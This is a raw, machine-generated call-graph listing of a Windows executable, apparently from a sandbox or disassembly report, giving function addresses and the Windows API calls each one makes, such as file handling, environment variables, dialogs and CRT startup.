23885->23942 23888 9f3dc2 23886->23888 23891 9f3ba5 23886->23891 23959 9f6dc1 74 API calls 23888->23959 23890 9f3b68 23890->23866 23891->23890 23914 a02c42 23891->23914 23893 9f3c26 23894 9f3cb1 23893->23894 23910 9f3c1d 23893->23910 23945 9fc991 23893->23945 23927 9faa88 23894->23927 23895 9f3c22 23895->23893 23944 9f2034 76 API calls 23895->23944 23897 9f3bf4 23897->23893 23897->23895 23898 9f3c12 23897->23898 23943 9f6dc1 74 API calls 23898->23943 23900 9f3cc4 23904 9f3d3e 23900->23904 23905 9f3d48 23900->23905 23931 9f92e6 23904->23931 23951 a028f1 121 API calls 23905->23951 23908 9f3d46 23908->23910 23952 9f1f94 74 API calls 23908->23952 23953 a01acf 23910->23953 23911->23871 23912->23873 23913->23869 23915 a02c51 23914->23915 23917 a02c5b 23914->23917 23960 9f6efd 75 API calls 23915->23960 23918 a02c9d Concurrency::cancel_current_task 23917->23918 23920 a02ca2 ___std_exception_copy 23917->23920 23926 a02cfd ___scrt_get_show_window_mode 23917->23926 23962 a1157a RaiseException 23918->23962 23919 a02da9 Concurrency::cancel_current_task 23963 a1157a RaiseException 23919->23963 23920->23919 23921 a02cd9 23920->23921 23920->23926 23961 a02b7b 75 API calls 3 library calls 23921->23961 23925 a02dc1 23926->23897 23926->23926 23928 9faa95 23927->23928 23930 9faa9f 23927->23930 23929 a0e24a new 8 API calls 23928->23929 23929->23930 23930->23900 23932 9f92f0 __EH_prolog 23931->23932 23964 9f7dc6 23932->23964 23935 9f709d 76 API calls 23936 9f9302 23935->23936 23967 9fca6c 23936->23967 23938 9f935c 23938->23908 23940 9fca6c 114 API calls 23941 9f9314 23940->23941 23941->23938 23941->23940 23976 9fcc51 97 API calls __vsnwprintf_l 23941->23976 23942->23890 23943->23910 23944->23893 23946 9fc9c4 23945->23946 23947 9fc9b2 23945->23947 23978 9f6249 80 API calls 23946->23978 23977 9f6249 80 API calls 23947->23977 23950 9fc9bc 23950->23894 23951->23908 23952->23910 23954 a01ad9 23953->23954 23955 a01af2 23954->23955 23958 a01b06 23954->23958 23979 a0075b 84 API calls 23955->23979 23957 a01af9 23957->23958 23959->23890 23960->23917 23961->23926 23962->23919 23963->23925 23965 9facf5 GetVersionExW 23964->23965 23966 9f7dcb 23965->23966 23966->23935 23973 9fca82 __vsnwprintf_l 23967->23973 23968 9fcbf7 23969 9fcc1f 23968->23969 23970 9fca0b 6 API calls 23968->23970 23971 a0067c SetThreadExecutionState RaiseException 23969->23971 23970->23969 23974 9fcbee 23971->23974 23972 a084bd 99 API calls 23972->23973 23973->23968 23973->23972 23973->23974 23975 9fab70 89 API calls 23973->23975 23974->23941 23975->23973 23976->23941 23977->23950 23978->23950 23979->23957 23980->23714 23981->23714 23982->23711 23984 9f5e4a 23983->23984 24028 9f5d67 23984->24028 23987 9f5e7d 23988 9f5eb5 23987->23988 24033 9fad65 CharUpperW CompareStringW 23987->24033 23988->23727 23990 9f8289 23989->23990 24039 a0179d CharUpperW 23990->24039 23992 9f8333 23992->23730 23994 9f7d7b 23993->23994 23995 9f7dbb 23994->23995 24040 9f7043 74 API calls 23994->24040 23995->23738 23997 9f7db3 24041 9f6dc1 74 API calls 23997->24041 24000 9f9d73 23999->24000 24002 9f9d82 23999->24002 24001 9f9d79 FlushFileBuffers 24000->24001 24000->24002 24001->24002 24003 9f9dfb SetFileTime 24002->24003 24003->23795 24004->23718 24005->23720 24006->23726 24007->23738 24008->23738 24009->23735 24010->23750 24011->23742 24012->23750 24014 9f998f 24013->24014 24015 9f9992 GetFileType 24013->24015 24014->23757 24016 9f99a0 24015->24016 24016->23757 24017->23760 24018->23762 24019->23763 24020->23786 24021->23786 24022->23786 24023->23786 24024->23786 24025->23791 24026->23789 24027->23798 24034 9f5c64 24028->24034 24030 9f5d88 24030->23987 24032 9f5c64 2 API calls 24032->24030 24033->23987 24035 9f5c6e 24034->24035 24037 9f5d56 24035->24037 24038 9fad65 CharUpperW CompareStringW 24035->24038 24037->24030 24037->24032 24038->24035 24039->23992 24040->23997 24041->23995 24043 9fc8db 24042->24043 24048 9fa90e 84 API calls 24043->24048 24045 9fc90d 24049 9fa90e 84 API calls 24045->24049 24047 9fc918 24048->24045 24049->24047 24051 9fa5fe 24050->24051 24052 9fa691 FindNextFileW 24051->24052 24053 9fa621 FindFirstFileW 24051->24053 24054 9fa69c GetLastError 24052->24054 24055 9fa6b0 24052->24055 24056 9fa638 24053->24056 24061 9fa675 24053->24061 24054->24055 24055->24061 24057 9fb66c 2 API calls 24056->24057 24058 9fa64d 24057->24058 24059 9fa66a GetLastError 24058->24059 24060 9fa651 FindFirstFileW 24058->24060 24059->24061 24060->24059 24060->24061 24061->23668 24071 a09d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24062->24071 24064 a09d21 24065 a09d2d 24064->24065 24072 a09d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24064->24072 24065->23445 24065->23446 24067->23449 24068->23455 24069->23455 24070->23458 24071->24064 24072->24065 24073->23466 24075 9f9ef7 76 API calls 24074->24075 24076 9f1f5b 24075->24076 24077 9f19a6 97 API calls 24076->24077 24079 9f1f78 24076->24079 24078 9f1f68 24077->24078 24078->24079 24081 9f6dc1 74 API calls 24078->24081 24079->23474 24079->23475 24081->24079 24083 a0acc8 GetDlgItem 24082->24083 24084 a0ac8f GetMessageW 24082->24084 24083->23485 24083->23486 24085 a0acb4 TranslateMessage DispatchMessageW 24084->24085 24086 a0aca5 IsDialogMessageW 24084->24086 24085->24083 24086->24083 24086->24085 24745 a0b8e0 93 API calls _swprintf 24746 a08ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24749 a216e0 CloseHandle 24096 9f10d5 24101 9f5bd7 24096->24101 24102 9f5be1 __EH_prolog 24101->24102 24103 9fb07d 82 API calls 24102->24103 24104 9f5bed 24103->24104 24108 9f5dcc GetCurrentProcess GetProcessAffinityMask 24104->24108 24796 a0ebf7 20 API calls 24121 a0e1f9 24122 a0e203 24121->24122 24123 a0df59 ___delayLoadHelper2@8 19 API calls 24122->24123 24124 a0e210 24123->24124 24751 a114f8 RaiseException 24797 a1abfd 6 API calls DloadUnlock 24753 a0eac0 27 API calls pre_c_initialization 24798 a1ebc1 21 API calls __vsnwprintf_l 24799 a097c0 10 API calls 24755 a19ec0 21 API calls 24800 a1b5c0 GetCommandLineA GetCommandLineW 24756 a0a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24758 a0acd0 100 API calls 24804 a019d0 26 API calls std::bad_exception::bad_exception 24139 a0ead2 24140 a0eade ___scrt_is_nonwritable_in_current_image 24139->24140 24165 a0e5c7 24140->24165 24142 a0eae5 24144 a0eb0e 24142->24144 24245 a0ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 24142->24245 24153 a0eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24144->24153 24176 a1824d 24144->24176 24148 a0eb2d ___scrt_is_nonwritable_in_current_image 24149 a0ebad 24184 a0f020 24149->24184 24153->24149 24246 a17243 38 API calls 3 library calls 24153->24246 24160 a0ebd9 24162 a0ebe2 24160->24162 24247 a1764a 28 API calls _abort 24160->24247 24248 a0e73e 13 API calls 2 library calls 24162->24248 24166 a0e5d0 24165->24166 24249 a0ed5b IsProcessorFeaturePresent 24166->24249 24168 a0e5dc 24250 a12016 24168->24250 24170 a0e5e1 24175 a0e5e5 24170->24175 24259 a180d7 24170->24259 24173 a0e5fc 24173->24142 24175->24142 24179 a18264 24176->24179 24177 a0ec4a DloadUnlock 5 API calls 24178 a0eb27 24177->24178 24178->24148 24180 a181f1 24178->24180 24179->24177 24181 a18220 24180->24181 24182 a0ec4a DloadUnlock 5 API calls 24181->24182 24183 a18249 24182->24183 24183->24153 24309 a0f350 24184->24309 24186 a0f033 GetStartupInfoW 24187 a0ebb3 24186->24187 24188 a1819e 24187->24188 24311 a1b290 24188->24311 24190 a0ebbc 24193 a0d5d4 24190->24193 24192 a181a7 24192->24190 24315 a1b59a 38 API calls 24192->24315 24436 a000cf 24193->24436 24197 a0d5f3 24485 a0a335 24197->24485 24199 a0d5fc 24489 a013b3 GetCPInfo 24199->24489 24201 a0d606 ___scrt_get_show_window_mode 24202 a0d619 GetCommandLineW 24201->24202 24203 a0d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24202->24203 24204 a0d628 24202->24204 24205 9f400a _swprintf 51 API calls 24203->24205 24492 a0bc84 24204->24492 24207 a0d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24205->24207 24503 a0aded LoadBitmapW 24207->24503 24210 a0d6a0 24497 a0d287 24210->24497 24211 a0d636 OpenFileMappingW 24214 a0d696 CloseHandle 24211->24214 24215 a0d64f MapViewOfFile 24211->24215 24214->24203 24217 a0d68d UnmapViewOfFile 24215->24217 24219 a0d660 __vsnwprintf_l 24215->24219 24217->24214 24222 a0d287 2 API calls 24219->24222 24224 a0d67c 24222->24224 24223 a08835 8 API calls 24225 a0d76a DialogBoxParamW 24223->24225 24224->24217 24226 a0d7a4 24225->24226 24227 a0d7b6 Sleep 24226->24227 24228 a0d7bd 24226->24228 24227->24228 24231 a0d7cb 24228->24231 24533 a0a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 24228->24533 24230 a0d7ea DeleteObject 24232 a0d806 24230->24232 24233 a0d7ff DeleteObject 24230->24233 24231->24230 24234 a0d837 24232->24234 24235 a0d849 24232->24235 24233->24232 24534 a0d2e6 6 API calls 24234->24534 24530 a0a39d 24235->24530 24237 a0d83d CloseHandle 24237->24235 24239 a0d883 24240 a1757e GetModuleHandleW 24239->24240 24241 a0ebcf 24240->24241 24241->24160 24242 a176a7 24241->24242 24668 a17424 24242->24668 24245->24142 24246->24149 24247->24162 24248->24148 24249->24168 24251 a1201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24250->24251 24263 a1310e 24251->24263 24255 a12031 24256 a1203c 24255->24256 24277 a1314a DeleteCriticalSection 24255->24277 24256->24170 24258 a12029 24258->24170 24305 a1b73a 24259->24305 24262 a1203f 8 API calls 3 library calls 24262->24175 24264 a13117 24263->24264 24266 a13140 24264->24266 24268 a12025 24264->24268 24278 a13385 24264->24278 24283 a1314a DeleteCriticalSection 24266->24283 24268->24258 24269 a1215c 24268->24269 24298 a1329a 24269->24298 24271 a12166 24272 a12171 24271->24272 24303 a13348 6 API calls try_get_function 24271->24303 24272->24255 24274 a1217f 24275 a1218c 24274->24275 24304 a1218f 6 API calls ___vcrt_FlsFree 24274->24304 24275->24255 24277->24258 24284 a13179 24278->24284 24281 a133bc InitializeCriticalSectionAndSpinCount 24282 a133a8 24281->24282 24282->24264 24283->24268 24285 a131ad 24284->24285 24286 a131a9 24284->24286 24285->24281 24285->24282 24286->24285 24289 a131cd 24286->24289 24291 a13219 24286->24291 24288 a131d9 GetProcAddress 24290 a131e9 __crt_fast_encode_pointer 24288->24290 24289->24285 24289->24288 24290->24285 24292 a13241 LoadLibraryExW 24291->24292 24293 a13236 24291->24293 24294 a13275 24292->24294 24295 a1325d GetLastError 24292->24295 24293->24286 24294->24293 24297 a1328c FreeLibrary 24294->24297 24295->24294 24296 a13268 LoadLibraryExW 24295->24296 24296->24294 24297->24293 24299 a13179 try_get_function 5 API calls 24298->24299 24300 a132b4 24299->24300 24301 a132cc TlsAlloc 24300->24301 24302 a132bd 24300->24302 24302->24271 24303->24274 24304->24272 24308 a1b753 24305->24308 24306 a0ec4a DloadUnlock 5 API calls 24307 a0e5ee 24306->24307 24307->24173 24307->24262 24308->24306 24310 a0f367 24309->24310 24310->24186 24310->24310 24312 a1b299 24311->24312 24313 a1b2a2 24311->24313 24316 a1b188 24312->24316 24313->24192 24315->24192 24317 a18fa5 IsInExceptionSpec 38 API calls 24316->24317 24318 a1b195 24317->24318 24336 a1b2ae 24318->24336 24320 a1b19d 24345 a1af1b 24320->24345 24323 a1b1b4 24323->24313 24324 a18518 __vsnwprintf_l 21 API calls 24325 a1b1c5 24324->24325 24332 a1b1f7 24325->24332 24352 a1b350 24325->24352 24328 a184de _free 20 API calls 24328->24323 24329 a1b1f2 24362 a1895a 20 API calls __dosmaperr 24329->24362 24331 a1b23b 24331->24332 24363 a1adf1 26 API calls 24331->24363 24332->24328 24333 a1b20f 24333->24331 24334 a184de _free 20 API calls 24333->24334 24334->24331 24337 a1b2ba ___scrt_is_nonwritable_in_current_image 24336->24337 24338 a18fa5 IsInExceptionSpec 38 API calls 24337->24338 24339 a1b2c4 24338->24339 24342 a1b348 ___scrt_is_nonwritable_in_current_image 24339->24342 24344 a184de _free 20 API calls 24339->24344 24364 a18566 38 API calls _abort 24339->24364 24365 a1a3f1 EnterCriticalSection 24339->24365 24366 a1b33f LeaveCriticalSection _abort 24339->24366 24342->24320 24344->24339 24346 a13dd6 __cftof 38 API calls 24345->24346 24347 a1af2d 24346->24347 24348 a1af3c GetOEMCP 24347->24348 24349 a1af4e 24347->24349 24351 a1af65 24348->24351 24350 a1af53 GetACP 24349->24350 24349->24351 24350->24351 24351->24323 24351->24324 24353 a1af1b 40 API calls 24352->24353 24354 a1b36f 24353->24354 24357 a1b3c0 IsValidCodePage 24354->24357 24359 a1b376 24354->24359 24361 a1b3e5 ___scrt_get_show_window_mode 24354->24361 24355 a0ec4a DloadUnlock 5 API calls 24356 a1b1ea 24355->24356 24356->24329 24356->24333 24358 a1b3d2 GetCPInfo 24357->24358 24357->24359 24358->24359 24358->24361 24359->24355 24367 a1aff4 GetCPInfo 24361->24367 24362->24332 24363->24332 24365->24339 24366->24339 24372 a1b02e 24367->24372 24376 a1b0d8 24367->24376 24370 a0ec4a DloadUnlock 5 API calls 24371 a1b184 24370->24371 24371->24359 24377 a1c099 24372->24377 24375 a1a275 __vsnwprintf_l 43 API calls 24375->24376 24376->24370 24378 a13dd6 __cftof 38 API calls 24377->24378 24379 a1c0b9 MultiByteToWideChar 24378->24379 24381 a1c18f 24379->24381 24382 a1c0f7 24379->24382 24383 a0ec4a DloadUnlock 5 API calls 24381->24383 24385 a18518 __vsnwprintf_l 21 API calls 24382->24385 24388 a1c118 __vsnwprintf_l ___scrt_get_show_window_mode 24382->24388 24386 a1b08f 24383->24386 24384 a1c189 24396 a1a2c0 20 API calls _free 24384->24396 24385->24388 24391 a1a275 24386->24391 24388->24384 24389 a1c15d MultiByteToWideChar 24388->24389 24389->24384 24390 a1c179 GetStringTypeW 24389->24390 24390->24384 24392 a13dd6 __cftof 38 API calls 24391->24392 24393 a1a288 24392->24393 24397 a1a058 24393->24397 24396->24381 24399 a1a073 __vsnwprintf_l 24397->24399 24398 a1a099 MultiByteToWideChar 24400 a1a0c3 24398->24400 24411 a1a24d 24398->24411 24399->24398 24401 a1a0e4 __vsnwprintf_l 24400->24401 24406 a18518 __vsnwprintf_l 21 API calls 24400->24406 24404 a1a199 24401->24404 24405 a1a12d MultiByteToWideChar 24401->24405 24402 a0ec4a DloadUnlock 5 API calls 24403 a1a260 24402->24403 24403->24375 24433 a1a2c0 20 API calls _free 24404->24433 24405->24404 24407 a1a146 24405->24407 24406->24401 24424 a1a72c 24407->24424 24411->24402 24412 a1a170 24412->24404 24415 a1a72c __vsnwprintf_l 11 API calls 24412->24415 24413 a1a1a8 24414 a18518 __vsnwprintf_l 21 API calls 24413->24414 24417 a1a1c9 __vsnwprintf_l 24413->24417 24414->24417 24415->24404 24416 a1a23e 24432 a1a2c0 20 API calls _free 24416->24432 24417->24416 24418 a1a72c __vsnwprintf_l 11 API calls 24417->24418 24420 a1a21d 24418->24420 24420->24416 24421 a1a22c WideCharToMultiByte 24420->24421 24421->24416 24422 a1a26c 24421->24422 24434 a1a2c0 20 API calls _free 24422->24434 24425 a1a458 __dosmaperr 5 API calls 24424->24425 24426 a1a753 24425->24426 24429 a1a75c 24426->24429 24435 a1a7b4 10 API calls 3 library calls 24426->24435 24428 a1a79c LCMapStringW 24428->24429 24430 a0ec4a DloadUnlock 5 API calls 24429->24430 24431 a1a15d 24430->24431 24431->24404 24431->24412 24431->24413 24432->24404 24433->24411 24434->24404 24435->24428 24437 a0e360 24436->24437 24438 a000d9 GetModuleHandleW 24437->24438 24439 a000f0 GetProcAddress 24438->24439 24440 a00154 24438->24440 24442 a00121 GetProcAddress 24439->24442 24443 a00109 24439->24443 24441 a00484 GetModuleFileNameW 24440->24441 24544 a170dd 42 API calls __vsnwprintf_l 24440->24544 24456 a004a3 24441->24456 24442->24440 24445 a00133 24442->24445 24443->24442 24445->24440 24446 a003be 24446->24441 24447 a003c9 GetModuleFileNameW CreateFileW 24446->24447 24448 a00478 CloseHandle 24447->24448 24449 a003fc SetFilePointer 24447->24449 24448->24441 24449->24448 24450 a0040c ReadFile 24449->24450 24450->24448 24453 a0042b 24450->24453 24453->24448 24455 a00085 2 API calls 24453->24455 24454 a004d2 CompareStringW 24454->24456 24455->24453 24456->24454 24457 a00520 24456->24457 24458 a00508 GetFileAttributesW 24456->24458 24535 9facf5 24456->24535 24538 a00085 24456->24538 24459 a0052a 24457->24459 24462 a00560 24457->24462 24458->24456 24458->24457 24461 a00542 GetFileAttributesW 24459->24461 24463 a0055a 24459->24463 24460 a0066f 24484 a09da4 GetCurrentDirectoryW 24460->24484 24461->24459 24461->24463 24462->24460 24464 9facf5 GetVersionExW 24462->24464 24463->24462 24465 a0057a 24464->24465 24466 a00581 24465->24466 24467 a005e7 24465->24467 24468 a00085 2 API calls 24466->24468 24469 9f400a _swprintf 51 API calls 24467->24469 24471 a0058b 24468->24471 24470 a0060f AllocConsole 24469->24470 24472 a00667 ExitProcess 24470->24472 24473 a0061c GetCurrentProcessId AttachConsole 24470->24473 24474 a00085 2 API calls 24471->24474 24545 a135b3 24473->24545 24476 a00595 24474->24476 24478 9fddd1 53 API calls 24476->24478 24477 a0063d GetStdHandle WriteConsoleW Sleep FreeConsole 24477->24472 24479 a005b0 24478->24479 24480 9f400a _swprintf 51 API calls 24479->24480 24481 a005c3 24480->24481 24482 9fddd1 53 API calls 24481->24482 24483 a005d2 24482->24483 24483->24472 24484->24197 24486 a00085 2 API calls 24485->24486 24487 a0a349 OleInitialize 24486->24487 24488 a0a36c GdiplusStartup SHGetMalloc 24487->24488 24488->24199 24490 a013d7 IsDBCSLeadByte 24489->24490 24490->24490 24491 a013ef 24490->24491 24491->24201 24493 a0bc8e 24492->24493 24494 a0bda4 24493->24494 24496 a0179d CharUpperW 24493->24496 24547 9fecad 80 API calls ___scrt_get_show_window_mode 24493->24547 24494->24210 24494->24211 24496->24493 24498 a0e360 24497->24498 24499 a0d294 SetEnvironmentVariableW 24498->24499 24500 a0d2b7 24499->24500 24501 a0d2df 24500->24501 24502 a0d2d3 SetEnvironmentVariableW 24500->24502 24501->24203 24502->24501 24504 a0ae15 24503->24504 24505 a0ae0e 24503->24505 24507 a0ae2a 24504->24507 24508 a0ae1b GetObjectW 24504->24508 24548 a09e1c FindResourceW 24505->24548 24509 a09d1a 4 API calls 24507->24509 24508->24507 24510 a0ae3d 24509->24510 24511 a0ae80 24510->24511 24512 a0ae5c 24510->24512 24513 a09e1c 12 API calls 24510->24513 24522 9fd31c 24511->24522 24562 a09d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24512->24562 24515 a0ae4d 24513->24515 24515->24512 24517 a0ae53 DeleteObject 24515->24517 24516 a0ae64 24563 a09d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24516->24563 24517->24512 24519 a0ae6d 24564 a09f5d 8 API calls ___scrt_get_show_window_mode 24519->24564 24521 a0ae74 DeleteObject 24521->24511 24573 9fd341 24522->24573 24524 9fd328 24613 9fda4e GetModuleHandleW FindResourceW 24524->24613 24527 a08835 24528 a0e24a new 8 API calls 24527->24528 24529 a08854 24528->24529 24529->24223 24531 a0a3cc GdiplusShutdown OleUninitialize 24530->24531 24531->24239 24533->24231 24534->24237 24536 9fad09 GetVersionExW 24535->24536 24537 9fad45 24535->24537 24536->24537 24537->24456 24539 a0e360 24538->24539 24540 a00092 GetSystemDirectoryW 24539->24540 24541 a000c8 24540->24541 24542 a000aa 24540->24542 24541->24456 24543 a000bb LoadLibraryW 24542->24543 24543->24541 24544->24446 24546 a135bb 24545->24546 24546->24477 24546->24546 24547->24493 24549 a09e3e SizeofResource 24548->24549 24550 a09e70 24548->24550 24549->24550 24551 a09e52 LoadResource 24549->24551 24550->24504 24551->24550 24552 a09e63 LockResource 24551->24552 24552->24550 24553 a09e77 GlobalAlloc 24552->24553 24553->24550 24554 a09e92 GlobalLock 24553->24554 24555 a09f21 GlobalFree 24554->24555 24556 a09ea1 __vsnwprintf_l 24554->24556 24555->24550 24557 a09f1a GlobalUnlock 24556->24557 24565 a09d7b GdipAlloc 24556->24565 24557->24555 24560 a09eef GdipCreateHBITMAPFromBitmap 24561 a09f05 24560->24561 24561->24557 24562->24516 24563->24519 24564->24521 24566 a09d9a 24565->24566 24567 a09d8d 24565->24567 24566->24557 24566->24560 24566->24561 24569 a09b0f 24567->24569 24570 a09b30 GdipCreateBitmapFromStreamICM 24569->24570 24571 a09b37 GdipCreateBitmapFromStream 24569->24571 24572 a09b3c 24570->24572 24571->24572 24572->24566 24574 9fd34b _wcschr __EH_prolog 24573->24574 24575 9fd37a GetModuleFileNameW 24574->24575 24576 9fd3ab 24574->24576 24577 9fd394 24575->24577 24615 9f99b0 24576->24615 24577->24576 24579 9f9653 79 API calls 24582 9fd7ab 24579->24582 24580 9fd407 24626 a15a90 26 API calls 3 library calls 24580->24626 24582->24524 24583 9fd41a 24627 a15a90 26 API calls 3 library calls 24583->24627 24584 9fd3db 24584->24580 24586 a03781 76 API calls 24584->24586 24597 9fd627 24584->24597 24586->24584 24587 9fd563 24587->24597 24645 9f9d30 77 API calls 24587->24645 24591 9fd57d ___std_exception_copy 24592 9f9bf0 80 API calls 24591->24592 24591->24597 24595 9fd5a6 ___std_exception_copy 24592->24595 24594 9fd42c 24594->24587 24594->24597 24628 9f9e40 24594->24628 24636 9f9bf0 24594->24636 24644 9f9d30 77 API calls 24594->24644 24595->24597 24610 9fd5b2 ___std_exception_copy 24595->24610 24646 a0137a MultiByteToWideChar 24595->24646 24597->24579 24598 9fd72b 24647 9fce72 76 API calls 24598->24647 24600 9fda0a 24652 9fce72 76 API calls 24600->24652 24602 9fd9fa 24602->24524 24603 9fd771 24648 a15a90 26 API calls 3 library calls 24603->24648 24605 9fd742 24605->24603 24607 a03781 76 API calls 24605->24607 24606 9fd78b 24649 a15a90 26 API calls 3 library calls 24606->24649 24607->24605 24609 a01596 WideCharToMultiByte 24609->24610 24610->24597 24610->24598 24610->24600 24610->24602 24610->24609 24650 9fdd6b 50 API calls __vsnprintf 24610->24650 24651 a158d9 26 API calls 3 library calls 24610->24651 24614 9fd32f 24613->24614 24614->24527 24616 9f99ba 24615->24616 24617 9f9a39 CreateFileW 24616->24617 24618 9f9aaa 24617->24618 24619 9f9a59 GetLastError 24617->24619 24621 9f9ae1 24618->24621 24623 9f9ac7 SetFileTime 24618->24623 24620 9fb66c 2 API calls 24619->24620 24622 9f9a79 24620->24622 24621->24584 24622->24618 24624 9f9a7d CreateFileW GetLastError 24622->24624 24623->24621 24625 9f9aa1 24624->24625 24625->24618 24626->24583 24627->24594 24629 9f9e64 SetFilePointer 24628->24629 24630 9f9e53 24628->24630 24631 9f9e82 GetLastError 24629->24631 24634 9f9e9d 24629->24634 24630->24634 24653 9f6fa5 75 API calls 24630->24653 24633 9f9e8c 24631->24633 24631->24634 24633->24634 24654 9f6fa5 75 API calls 24633->24654 24634->24594 24637 9f9c03 24636->24637 24639 9f9bfc 24636->24639 24637->24639 24640 9f9c9e 24637->24640 24642 9f9cc0 24637->24642 24655 9f984e 24637->24655 24639->24594 24640->24639 24667 9f6f6b 75 API calls 24640->24667 24642->24639 24643 9f984e 5 API calls 24642->24643 24643->24642 24644->24594 24645->24591 24646->24610 24647->24605 24648->24606 24649->24597 24650->24610 24651->24610 24652->24602 24653->24629 24654->24634 24656 9f985c GetStdHandle 24655->24656 24657 9f9867 ReadFile 24655->24657 24656->24657 24658 9f9880 24657->24658 24664 9f98a0 24657->24664 24659 9f9989 GetFileType 24658->24659 24660 9f9887 24659->24660 24661 9f98a8 GetLastError 24660->24661 24662 9f98b7 24660->24662 24663 9f9895 24660->24663 24661->24662 24661->24664 24662->24664 24665 9f98c7 GetLastError 24662->24665 24666 9f984e GetFileType 24663->24666 24664->24637 24665->24663 24665->24664 24666->24664 24667->24639 24669 a17430 IsInExceptionSpec 24668->24669 24670 a17448 24669->24670 24671 a1757e _abort GetModuleHandleW 24669->24671 24690 a1a3f1 EnterCriticalSection 24670->24690 24673 a1743c 24671->24673 24673->24670 24702 a175c2 GetModuleHandleExW 24673->24702 24677 a17450 24685 a174ee 24677->24685 24687 a174c5 24677->24687 24710 a17f30 20 API calls _abort 24677->24710 24678 a17537 24711 a21a19 5 API calls DloadUnlock 24678->24711 24679 a1750b 24694 a1753d 24679->24694 24683 a181f1 _abort 5 API calls 24689 a174dd 24683->24689 24684 a181f1 _abort 5 API calls 24684->24685 24691 a1752e 24685->24691 24687->24683 24687->24689 24689->24684 24690->24677 24712 a1a441 LeaveCriticalSection 24691->24712 24693 a17507 24693->24678 24693->24679 24713 a1a836 24694->24713 24697 a1756b 24699 a175c2 _abort 8 API calls 24697->24699 24698 a1754b GetPEB 24698->24697 24700 a1755b GetCurrentProcess TerminateProcess 24698->24700 24701 a17573 ExitProcess 24699->24701 24700->24697 24703 a175ec GetProcAddress 24702->24703 24704 a1760f 24702->24704 24705 a17601 24703->24705 24706 a17615 FreeLibrary 24704->24706 24707 a1761e 24704->24707 24705->24704 24706->24707 24708 a0ec4a DloadUnlock 5 API calls 24707->24708 24709 a17628 24708->24709 24709->24670 24710->24687 24712->24693 24714 a1a85b 24713->24714 24718 a1a851 24713->24718 24715 a1a458 __dosmaperr 5 API calls 24714->24715 24715->24718 24716 a0ec4a DloadUnlock 5 API calls 24717 a17547 24716->24717 24717->24697 24717->24698 24718->24716 24811 9f6110 80 API calls 24759 a0a430 73 API calls 24814 a0be49 103 API calls 4 library calls 24816 9f1f05 126 API calls __EH_prolog 24760 a0ea00 46 API calls 6 library calls 22915 a0db01 22916 a0daaa 22915->22916 22918 a0df59 22916->22918 22946 a0dc67 22918->22946 22920 a0df73 22921 a0dfd0 22920->22921 22922 a0dff4 22920->22922 22923 a0ded7 DloadReleaseSectionWriteAccess 11 API calls 22921->22923 22926 a0e06c LoadLibraryExA 22922->22926 22928 a0e0cd 22922->22928 22931 a0e0df 22922->22931 22941 a0e19b 22922->22941 22924 a0dfdb RaiseException 22923->22924 22925 a0e1c9 22924->22925 22927 a0ec4a DloadUnlock 5 API calls 22925->22927 22926->22928 22929 a0e07f GetLastError 22926->22929 22930 a0e1d8 22927->22930 22928->22931 22932 a0e0d8 FreeLibrary 22928->22932 22933 a0e092 22929->22933 22934 a0e0a8 22929->22934 22930->22916 22935 a0e13d GetProcAddress 22931->22935 22931->22941 22932->22931 22933->22928 22933->22934 22936 a0ded7 DloadReleaseSectionWriteAccess 11 API calls 22934->22936 22937 a0e14d GetLastError 22935->22937 22935->22941 22938 a0e0b3 RaiseException 22936->22938 22939 a0e160 22937->22939 22938->22925 22939->22941 22942 a0ded7 DloadReleaseSectionWriteAccess 11 API calls 22939->22942 22957 a0ded7 22941->22957 22943 a0e181 RaiseException 22942->22943 22944 a0dc67 ___delayLoadHelper2@8 11 API calls 22943->22944 22945 a0e198 22944->22945 22945->22941 22947 a0dc73 22946->22947 22948 a0dc99 22946->22948 22965 a0dd15 22947->22965 22948->22920 22951 a0dc94 22975 a0dc9a 22951->22975 22954 a0ec4a DloadUnlock 5 API calls 22955 a0df55 22954->22955 22955->22920 22956 a0df24 22956->22954 22958 a0dee9 22957->22958 22959 a0df0b 22957->22959 22960 a0dd15 DloadLock 8 API calls 22958->22960 22959->22925 22961 a0deee 22960->22961 22962 a0df06 22961->22962 22963 a0de67 DloadProtectSection 3 API calls 22961->22963 22984 a0df0f 8 API calls DloadUnlock 22962->22984 22963->22962 22966 a0dc9a DloadUnlock 3 API calls 22965->22966 22967 a0dd2a 22966->22967 22968 a0ec4a DloadUnlock 5 API calls 22967->22968 22969 a0dc78 22968->22969 22969->22951 22970 a0de67 22969->22970 22972 a0de7c DloadObtainSection 22970->22972 22971 a0de82 22971->22951 22972->22971 22973 a0deb7 VirtualProtect 22972->22973 22983 a0dd72 VirtualQuery GetSystemInfo 22972->22983 22973->22971 22976 a0dca7 22975->22976 22977 a0dcab 22975->22977 22976->22956 22978 a0dcb3 GetModuleHandleW 22977->22978 22979 a0dcaf 22977->22979 22980 a0dcc9 GetProcAddress 22978->22980 22982 a0dcc5 22978->22982 22979->22956 22981 a0dcd9 GetProcAddress 22980->22981 22980->22982 22981->22982 22982->22956 22983->22973 22984->22959 24761 a0ec0b 28 API calls 2 library calls 24818 a0db0b 19 API calls ___delayLoadHelper2@8 22989 a0c40e 22990 a0c4c7 22989->22990 22997 a0c42c _wcschr 22989->22997 22991 a0c4e5 22990->22991 23007 a0be49 _wcsrchr 22990->23007 23044 a0ce22 22990->23044 22994 a0ce22 18 API calls 22991->22994 22991->23007 22994->23007 22995 a0ca8d 22997->22990 22998 a017ac CompareStringW 22997->22998 22998->22997 22999 a0c11d SetWindowTextW 22999->23007 23004 a0bf0b SetFileAttributesW 23006 a0bfc5 GetFileAttributesW 23004->23006 23017 a0bf25 ___scrt_get_show_window_mode 23004->23017 23006->23007 23009 a0bfd7 DeleteFileW 23006->23009 23007->22995 23007->22999 23007->23004 23010 a0c2e7 GetDlgItem 